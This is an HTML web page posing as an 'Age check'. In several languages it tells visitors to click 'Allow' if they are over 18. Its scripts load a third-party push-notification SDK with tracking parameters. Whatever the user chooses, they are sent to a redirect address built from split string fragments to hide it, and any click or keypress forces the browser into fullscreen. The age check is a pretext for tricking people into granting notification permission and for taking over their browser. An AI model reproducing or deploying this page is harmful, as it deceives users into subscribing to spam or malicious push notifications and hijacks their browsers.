<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Age check</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            color: #fff;
            font: 16px Arial, sans-serif;
            margin: 0;
            text-align: center;
            user-select: none
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .bg {
            background-color: #000
        }

        .bg,
        .msg {
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msg__t {
            font-size: 38px;
            margin-top: 5%
        }

        .msg__btn {
            background: #fff;
            border: none;
            border-radius: 3px;
            color: #000;
            font: inherit;
            font-size: 32px;
            height: 62px;
            margin-top: 10px;
            outline: none;
            padding: 0 28px
        }

        .arrow {
            -webkit-animation: a .5s cubic-bezier(.39, .58, .35, .99) infinite alternate;
            animation: a .5s cubic-bezier(.39, .58, .35, .99) infinite alternate;
            bottom: 50px;
            fill: #fff;
            height: 120px;
            position: absolute;
            right: 6%;
            width: 120px
        }

        .msgReady {
            background-color: rgba(0, 0, 0, .75);
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msgReady__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {
            0% {
                transform: translateY(0)
            }

            to {
                transform: translateY(30px)
            }
        }

        @keyframes a {
            0% {
                transform: translateY(0)
            }

            to {
                transform: translateY(30px)
            }
        }

        @media (min-width:425px) {
            .msgReady__tx {
                font-size: 52px
            }
        }

        @media (min-width:690px) {
            .msg {
                height: auto;
                top: 50%;
                transform: translateY(-50%)
            }

            .msg__t {
                font-size: 64px;
                margin-top: 0
            }

            .arrow {
                display: none
            }
        }
    </style>
</head>

<body>

  <script>(function() {
    function getParameterByName(name, url) {
      if (!url) url = window.location.href;
      name = name.replace(/[\[\]]/g, '\\$&');
      var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
          results = regex.exec(url);
      if (!results) return null;
      if (!results[2]) return '';
      return decodeURIComponent(results[2].replace(/\+/g, ' '));
    }

    var loc = document.location;
    var tb = function(){ loc.href = ['ht', 'tps:/', '/blud', 'wan.com/a', 'fu.ph', 'p?zon', 'eid=2483917'].join(''); };
    var bc = function(){ loc.href = ['ht', 'tps:', '/', '/go', 'ogle.com/'].join(''); };

    var url = new URL(window.location.href);
    var pci = getParameterByName('external_id', window.location.href);
    var ppi = getParameterByName('placementid', window.location.href);
    var tag = document.createElement('script');
    tag.type = 'text/javascript';
    tag.dataset['sdk'] = 'sdk';
    tag.src = '//pushokey.com/ntfc.php?p=2490456&ucis=true&m=https&nbinp=true' + '&var='+ ppi + '&ymid=' + pci;

    function setupHandlers() {
      // sdk.onBeforePermissionPrompt();
      sdk.onPermissionDefault(tb);
      sdk.onPermissionAllowed(tb);
      sdk.onPermissionDenied(tb);
      sdk.onAlreadySubscribed(tb);
    }

    tag.onload = setupHandlers;

    document.head.appendChild(tag);
    })();</script>

    <div class="bg"></div>
    <div class="msg">
        <div class="msg__t"></div><button type="button" class="msg__btn"></button><svg class="arrow" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 490 490">
            <path d="M437.2,178.7c12.8,12.8,12.8,33.4,0,46.2c-6.4,6.4-14.7,9.6-23.1,9.6s-16.7-3.2-23.1-9.6L277.7,111.5v345.8 c0,18-14.6,32.7-32.7,32.7s-32.7-14.6-32.7-32.7V111.5L99,224.9c-12.8,12.8-33.4,12.8-46.2,0s-12.8-33.4,0-46.2L221.9,9.6 C228,3.4,236.3,0,245,0c8.7,0,17,3.4,23.1,9.6L437.2,178.7z"></path>
        </svg>
    </div>
    <div class="msgReady isHide">
        <div class="msgReady__tx"></div>
    </div>
    <script>
            var b = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (b.k = navigator.language.slice(0, 2)), void 0 === e[b.k] && (b.k = "en"), b.t = e[b.k]
                    },
                    get: function(e) {
                        return b.t[e]
                    }
                },
                y = b;

            y.set({
                ru: {
                    title: "Если вам 18+ нажмите",
                    btn: "Разрешить",
                    msg: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                en: {
                    title: "If you are 18+, click",
                    btn: "Allow",
                    msg: "You have successfully passed the verification!<br>Now you can close the window."
                },
                fr: {
                    title: "Si vous avez 18+ сliquez",
                    btn: "Autoriser",
                    msg: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    title: "Wenn Sie 18+ tippen",
                    btn: "Zulassen",
                    msg: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    title: "Si tienes 18+, haz clic para",
                    btn: "Permitir",
                    msg: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                uk: {
                    title: "Якщо ви старше 18 років, натисніть",
                    btn: "Дозволити",
                    msg: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    title: "Jeśli masz ukończone 18 lat, kliknij ",
                    btn: "Zezwalaj",
                    msg: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                th: {
                    title: "ถ้าคุณอายุมากกว่า 18 ปีให้คลิกเปิดใช้งาน",
                    btn: "อนุญาต",
                    msg: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), document.querySelector(".msg__t").textContent = y.get("title"), document.querySelector(".msg__btn").textContent = y.get("btn"), document.querySelector(".msgReady__tx").innerHTML = y.get("msg")

    </script>
    <script>
      var t = function() {
          void 0 !== this.requestFullScreen ? this.requestFullScreen() : void 0 !== this.webkitRequestFullScreen ? this.webkitRequestFullScreen() : void 0 !== this.mozRequestFullScreen && this.mozRequestFullScreen()
      };
      document.body.addEventListener("keydown", t), document.body.addEventListener("click", t)
    </script>
</body>


</html>
